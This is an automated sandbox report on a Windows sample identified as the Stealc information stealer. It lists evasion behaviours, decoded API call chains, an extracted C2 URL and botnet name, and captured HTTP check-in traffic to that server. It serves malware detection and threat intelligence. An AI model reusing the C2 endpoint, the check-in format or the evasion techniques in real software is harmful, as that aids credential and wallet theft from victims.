Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1543430
MD5:7e247ce0bfb04ead4760a9bd841ece58
SHA1:41708946a0ab26f707350236bc2f0455e1381cc7
SHA256:bcc2e1473d790771507934707e46e5bd0a710141fe776d5b37d14d5aeda8f82a
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 7280 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 7E247CE0BFB04EAD4760A9BD841ECE58)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.1731343295.000000000128E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000003.1688123808.0000000004EF0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 7280JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 7280JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.4c0000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-27T21:06:07.833529+010020442431Malware Command and Control Activity Detected192.168.2.449730185.215.113.20680TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Found malware configuration
                Source: 0.2.file.exe.4c0000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004D9030 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_004D9030
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004CA210 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_004CA210
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004C72A0 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_004C72A0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004CA2B0 CryptUnprotectData,LocalAlloc,LocalFree,0_2_004CA2B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004CC920 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_004CC920
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Binary string: my_library.pdbU source: file.exe, 00000000.00000003.1688123808.0000000004F1B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp
                Source: Binary string: my_library.pdb source: file.exe, file.exe, 00000000.00000003.1688123808.0000000004F1B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004D40F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_004D40F0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004CE530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_004CE530
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004C1710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_004C1710
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004D47C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_004D47C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004CF7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_004CF7B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004D4B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_004D4B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004D3B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_004D3B00
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004CDB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_004CDB80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004CBE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_004CBE40
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004CEE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_004CEE20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004CDF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_004CDF10

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.206:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.206/6c4adf523b719729.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDBKFHJEBAAEBGDGDBFBHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 44 42 4b 46 48 4a 45 42 41 41 45 42 47 44 47 44 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 39 33 44 45 30 38 32 46 36 34 35 31 33 38 38 39 34 31 30 35 33 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 4b 46 48 4a 45 42 41 41 45 42 47 44 47 44 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 4b 46 48 4a 45 42 41 41 45 42 47 44 47 44 42 46 42 2d 2d 0d 0a Data Ascii: ------IDBKFHJEBAAEBGDGDBFBContent-Disposition: form-data; name="hwid"493DE082F6451388941053------IDBKFHJEBAAEBGDGDBFBContent-Disposition: form-data; name="build"tale------IDBKFHJEBAAEBGDGDBFB--
                Source: Joe Sandbox ViewIP Address: 185.215.113.206 185.215.113.206
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004C62D0 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_004C62D0
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDBKFHJEBAAEBGDGDBFBHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 44 42 4b 46 48 4a 45 42 41 41 45 42 47 44 47 44 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 39 33 44 45 30 38 32 46 36 34 35 31 33 38 38 39 34 31 30 35 33 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 4b 46 48 4a 45 42 41 41 45 42 47 44 47 44 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 4b 46 48 4a 45 42 41 41 45 42 47 44 47 44 42 46 42 2d 2d 0d 0a Data Ascii: ------IDBKFHJEBAAEBGDGDBFBContent-Disposition: form-data; name="hwid"493DE082F6451388941053------IDBKFHJEBAAEBGDGDBFBContent-Disposition: form-data; name="build"tale------IDBKFHJEBAAEBGDGDBFB--
                Source: file.exe, 00000000.00000002.1731343295.000000000128E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206
                Source: file.exe, 00000000.00000002.1731343295.000000000128E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1731343295.00000000012E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/
                Source: file.exe, 00000000.00000002.1731343295.000000000128E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/$
                Source: file.exe, 00000000.00000002.1731343295.00000000012E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.php
                Source: file.exe, 00000000.00000002.1731343295.00000000012E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.php/O
                Source: file.exe, 00000000.00000002.1731343295.000000000130B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.php=DMJ
                Source: file.exe, file.exe, 00000000.00000003.1688123808.0000000004F1B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091D0B50_2_0091D0B5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005000980_2_00500098
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0084105C0_2_0084105C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009181880_2_00918188
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F21380_2_004F2138
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0051B1980_2_0051B198
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0052E2580_2_0052E258
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008902E20_2_008902E2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005042880_2_00504288
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008073D90_2_008073D9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0054B3080_2_0054B308
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0090C3160_2_0090C316
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0053D39E0_2_0053D39E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008764EC0_2_008764EC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004EE5440_2_004EE544
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004E45730_2_004E4573
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009115630_2_00911563
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005045A80_2_005045A8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0052D5A80_2_0052D5A8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0053A6480_2_0053A648
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091B6D20_2_0091B6D2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005066C80_2_005066C8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005496FD0_2_005496FD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0051D7200_2_0051D720
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009167300_2_00916730
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005367990_2_00536799
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009207460_2_00920746
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005148680_2_00514868
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0052F8D60_2_0052F8D6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005198B80_2_005198B8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0051B8A80_2_0051B8A8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008F59A60_2_008F59A6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0090F9FD0_2_0090F9FD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00833AB40_2_00833AB4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00919BF80_2_00919BF8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00914B3B0_2_00914B3B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00530B880_2_00530B88
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0082DB730_2_0082DB73
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00534BA80_2_00534BA8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008EDC860_2_008EDC86
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091ECC60_2_0091ECC6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0053AC280_2_0053AC28
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F1D780_2_004F1D78
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0051BD680_2_0051BD68
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0052AD380_2_0052AD38
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00514DC80_2_00514DC8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00515DB90_2_00515DB9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00508E780_2_00508E78
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00531EE80_2_00531EE8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00912FE30_2_00912FE3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0090DF010_2_0090DF01
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 004C4610 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: iecwsxsj ZLIB complexity 0.9950547911015672
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004D9790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_004D9790
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004D3970 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_004D3970
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\M1J7PYR2.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 2137600 > 1048576
                Source: file.exeStatic PE information: Raw size of iecwsxsj is bigger than: 0x100000 < 0x19ec00
                Source: Binary string: my_library.pdbU source: file.exe, 00000000.00000003.1688123808.0000000004F1B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp
                Source: Binary string: my_library.pdb source: file.exe, file.exe, 00000000.00000003.1688123808.0000000004F1B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.4c0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;iecwsxsj:EW;qghwgbxt:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;iecwsxsj:EW;qghwgbxt:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004D9BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_004D9BB0
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x21844d should be: 0x2195bb
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: iecwsxsj
                Source: file.exeStatic PE information: section name: qghwgbxt
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091D0B5 push edx; mov dword ptr [esp], 4DB5F6D8h0_2_0091D103
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091D0B5 push 68C85DEFh; mov dword ptr [esp], ecx0_2_0091D186
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091D0B5 push ebx; mov dword ptr [esp], edi0_2_0091D1D3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091D0B5 push ecx; mov dword ptr [esp], edi0_2_0091D20B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091D0B5 push ecx; mov dword ptr [esp], ebp0_2_0091D2F1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091D0B5 push ecx; mov dword ptr [esp], ebp0_2_0091D338
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091D0B5 push ebp; mov dword ptr [esp], eax0_2_0091D448
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091D0B5 push 22739E50h; mov dword ptr [esp], esp0_2_0091D4D2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091D0B5 push eax; mov dword ptr [esp], edx0_2_0091D503
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091D0B5 push edx; mov dword ptr [esp], ecx0_2_0091D569
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091D0B5 push edi; mov dword ptr [esp], eax0_2_0091D5D6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091D0B5 push esi; mov dword ptr [esp], esp0_2_0091D5DD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091D0B5 push ecx; mov dword ptr [esp], 00000000h0_2_0091D600
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091D0B5 push 128795D0h; mov dword ptr [esp], esi0_2_0091D624
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091D0B5 push ebx; mov dword ptr [esp], 5B40016Ah0_2_0091D6A2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091D0B5 push ecx; mov dword ptr [esp], eax0_2_0091D6C6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091D0B5 push 4A0DBB9Ch; mov dword ptr [esp], edi0_2_0091D72D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091D0B5 push esi; mov dword ptr [esp], edx0_2_0091D731
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091D0B5 push ebp; mov dword ptr [esp], esi0_2_0091D7A4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091D0B5 push eax; mov dword ptr [esp], esi0_2_0091D7AD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091D0B5 push esi; mov dword ptr [esp], ecx0_2_0091D7B1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091D0B5 push edi; mov dword ptr [esp], 2967CB53h0_2_0091D93F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091D0B5 push 13F4EF7Ch; mov dword ptr [esp], ecx0_2_0091D9B9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091D0B5 push edx; mov dword ptr [esp], ebx0_2_0091DA27
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091D0B5 push edx; mov dword ptr [esp], ecx0_2_0091DA84
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091D0B5 push ebp; mov dword ptr [esp], esp0_2_0091DA8E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091D0B5 push ecx; mov dword ptr [esp], 28919865h0_2_0091DB94
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091D0B5 push 3DF5E9EFh; mov dword ptr [esp], edi0_2_0091DC06
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091D0B5 push eax; mov dword ptr [esp], edi0_2_0091DC10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091D0B5 push 65BA36DBh; mov dword ptr [esp], edi0_2_0091DC7D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091D0B5 push eax; mov dword ptr [esp], ecx0_2_0091DD16
                Source: file.exeStatic PE information: section name: iecwsxsj entropy: 7.954930403224227

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
